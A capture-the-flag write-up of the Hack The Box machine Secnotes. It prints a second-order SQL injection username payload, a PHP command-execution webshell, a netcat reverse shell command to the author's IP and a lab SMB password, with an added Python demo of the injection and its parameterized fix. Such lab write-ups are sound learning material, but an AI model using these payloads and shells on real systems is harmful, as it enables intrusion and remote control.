
Secnotes Write-up (HTB)

George O
Jan 20, 2019 · 6 min read

This is a write-up for the recently retired Secnotes machine on the Hack The Box platform. If you don’t already know, Hack The Box is a website where you can further your cybersecurity knowledge by hacking into a range of different machines.

TL;DR: SQLi & WSL Escape | I did this box a few months ago, so the commentary on it may be a little rusty. It’s clear that it was popular, since it wasn’t voted out for so long. The main attack vectors in this were SQL Injection through the login field, and then escaping through cleartext passwords in the Windows Subsystem for Linux.

PART ONE: USER

nmap -sV -sC -oN nmap.log 10.10.10.97

It seems like there are only two services running on this box: HTTP & SMB. We can also see that the webserver is running Microsoft IIS, which is definitely important to note.

Visiting the website shows a login screen, with the option to create an account:


I initially tried some simple logins (such as admin/admin or admin/password) but didn’t get anywhere. So, I decided to create an account with the details user123/password123 and see what’s inside. The basic functionality of the website is as follows:


There are a few important functions to take from this:

  • We can create/delete notes
  • We can change our own password
  • We can contact the owner

My first discovery on here was that we could perform XSS on any of the fields:


Since we have an option to send forms to the owner, I tried forming a cookie-stealing XSS that would steal an administrator’s cookie, however after leaving it for a while, I never received a call back.

I then tried to do some SQLi on the PHPSESSID cookie, and some SQLi on the initial login, but got nowhere through this. Since I’d hit a dead end, I gave up for that evening.

When I came back to the box, I decided to try a method that I had seen whilst reading through a write-up of an older box, Nightmare. In that box, the SQL injection was achieved by creating an account whose username contained the injection payload, so the payload only fired when the application later used the stored username in a query.

Let’s give this a go by creating an account with the username user' OR 1=1#:


With this now created, we can log in and view all the notes!
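To show why this worked when injecting into the login form did not, here is an added example (not code from the write-up or the box) of a second-order SQL injection in Python, using an in-memory SQLite database as a constructed stand-in for the site's notes table: the username is stored safely at registration and only becomes dangerous when a later query concatenates it. SQLite's line comment is `--` rather than MySQL's `#`, so the payload is adapted accordingly.

```python
import sqlite3

# Constructed stand-in for the app's MySQL backend. SQLite's line comment is
# "--" rather than MySQL's "#", so the write-up's payload is adapted accordingly.
PAYLOAD = "user' OR 1=1-- "

def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.execute("CREATE TABLE notes (owner TEXT, title TEXT, body TEXT)")
    # Constructed sample notes; titles follow the write-up, bodies are made up.
    db.executemany("INSERT INTO notes VALUES (?, ?, ?)", [
        ("tyler", "Mimi's Sticky Buns", "recipe"),
        ("tyler", "TestNote", "test"),
        ("tyler", "new-site", "share details"),
        ("tyler", "login", "other details"),
    ])
    return db

def register(db, username, password):
    # Registration is parameterized, so the payload is stored verbatim. Filtering
    # here would not fix the bug: the stored value is what gets misused later.
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))

def login(db, username, password):
    # Returns the username as stored, the way the session would carry it.
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None

def notes_vulnerable(db, session_user):
    # The username came from our own database, so it was "trusted" and
    # concatenated. With the payload the WHERE clause reads
    #   owner = 'user' OR 1=1-- '
    # and every user's notes come back.
    sql = f"SELECT title FROM notes WHERE owner = '{session_user}'"
    return [row[0] for row in db.execute(sql)]

def notes_fixed(db, session_user):
    # Bound parameter: the stored value is compared as data, never parsed as SQL.
    return [row[0] for row in
            db.execute("SELECT title FROM notes WHERE owner = ?", (session_user,))]

def demo():
    db = build_db()
    register(db, PAYLOAD, "password123")
    user = login(db, PAYLOAD, "password123")
    return notes_vulnerable(db, user), notes_fixed(db, user)
```

`demo()` returns the two result lists side by side: the concatenated query leaks all four of tyler's notes, while the parameterized one correctly returns nothing for the new account.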


Whilst Mimi’s Sticky Buns and TestNote were useless, the other two were interesting:


It looks like we’ve found some SMB credentials! We can now connect to the server like so:

george@kali:~/htb/secnotes$ smbclient -U tyler \\\\10.10.10.97\\new-site
Enter WORKGROUP\tyler's password: 92g!mA8BGjOirkL%OG*&
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\10.10.10.97\new-site\
smb: \> ls
  .                                   D        0  Sat Sep  8 18:59:16 2018
  ..                                  D        0  Sat Sep  8 18:59:16 2018
  iisstart.htm                        A      696  Thu Jun 21 11:26:03 2018
  iisstart.php                        A       78  Sat Sep  8 18:57:36 2018
  iisstart.png                        A    98757  Thu Jun 21 11:26:03 2018

                12978687 blocks of size 4096. 7860782 blocks available
smb: \>

This is strange — we have some IIS files that we haven’t come across yet. After attempting some further enumeration on this service, I decided to rescan the system to see if our initial nmap scan had missed anything:

nmap -p- -T5 10.10.10.97

Here, we can see a port that didn’t appear before: 8808. Attempting to connect to this port reveals that it’s running a website:


As such, let’s visit this in the browser:


Since we’ve now found the default IIS page (iisstart.htm), we can assume that the SMB server serves the pages for this site. We can test this theory by uploading a simple “test.html” webpage:


From here it’s trivial to upload a PHP webshell and therefore get RCE. I used this really short script as my webshell:

<form action="rce.php" method="get"><input type="text" name="cmd"><input type="submit">
<?php
    if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
    }
?>

With this uploaded, we can now run commands:


Since we have read access, we can go ahead and read the user flag:


PART TWO: ROOT

nc64.exe -e cmd.exe 10.10.14.214 4444

…into the webshell, and waited to catch it with netcat:


With a proper shell now in place, we can begin enumerating. Before long, I found a strange folder in the C:\ directory:

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 9CDD-BADA

 Directory of C:\

06/21/2018  03:07 PM    <DIR>          Distros
06/21/2018  06:47 PM    <DIR>          inetpub
06/22/2018  02:09 PM    <DIR>          Microsoft
04/11/2018  04:38 PM    <DIR>          PerfLogs
06/21/2018  08:15 AM    <DIR>          php7
08/19/2018  02:56 PM    <DIR>          Program Files
06/21/2018  06:47 PM    <DIR>          Program Files (x86)
06/21/2018  03:07 PM       201,749,452 Ubuntu.zip
06/21/2018  03:00 PM    <DIR>          Users
08/19/2018  11:15 AM    <DIR>          Windows
09/09/2018  03:25 AM                 0 __output
               2 File(s)    201,749,452 bytes
               9 Dir(s)  32,515,137,536 bytes free

C:\>

It’s strange to find a Distros folder on a Windows machine, so it seems like this may be what we’re looking for. Inside the Distros folder there was one other folder: Ubuntu.

C:\Distros\Ubuntu>dir
 Volume in drive C has no label.
 Volume Serial Number is 9CDD-BADA

 Directory of C:\Distros\Ubuntu

09/09/2018  02:53 AM    <DIR>          .
09/09/2018  02:53 AM    <DIR>          ..
07/11/2017  06:10 PM           190,434 AppxBlockMap.xml
07/11/2017  06:10 PM             2,475 AppxManifest.xml
06/21/2018  03:07 PM    <DIR>          AppxMetadata
07/11/2017  06:11 PM            10,554 AppxSignature.p7x
06/21/2018  03:07 PM    <DIR>          Assets
06/21/2018  03:07 PM    <DIR>          images
07/11/2017  06:10 PM       201,254,783 install.tar.gz
07/11/2017  06:10 PM             4,840 resources.pri
06/21/2018  05:51 PM    <DIR>          temp
07/11/2017  06:10 PM           222,208 ubuntu.exe
07/11/2017  06:10 PM               809 [Content_Types].xml
               7 File(s)    201,686,103 bytes
               6 Dir(s)  32,515,235,840 bytes free

C:\Distros\Ubuntu>

Launching ubuntu.exe just makes the shell hang, and eventually die. I did some research on this folder for a while, and found out that it is part of WSL (Windows Subsystem for Linux). Since we’re looking for ways to get into this, I searched for some other WSL-related files:

Directory of C:\Windows\System32: 114,688 wsl.exe
Directory of C:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf: 114,688 wsl.exe
Directory of C:\Windows\System32: 115,712 bash.exe
Directory of C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5: 115,712 bash.exe
Directory of C:\Distros\Ubuntu: 222,208 ubuntu.exe

I then ran the wsl.exe file, which gave us a shell (the python command simply upgrades us to a TTY shell):


As part of the usual Linux enumeration, I checked the .bash_history file and found the following:


The administrator SMB credentials are there! Let’s copy this command into our own terminal:


And with that, the box is complete!
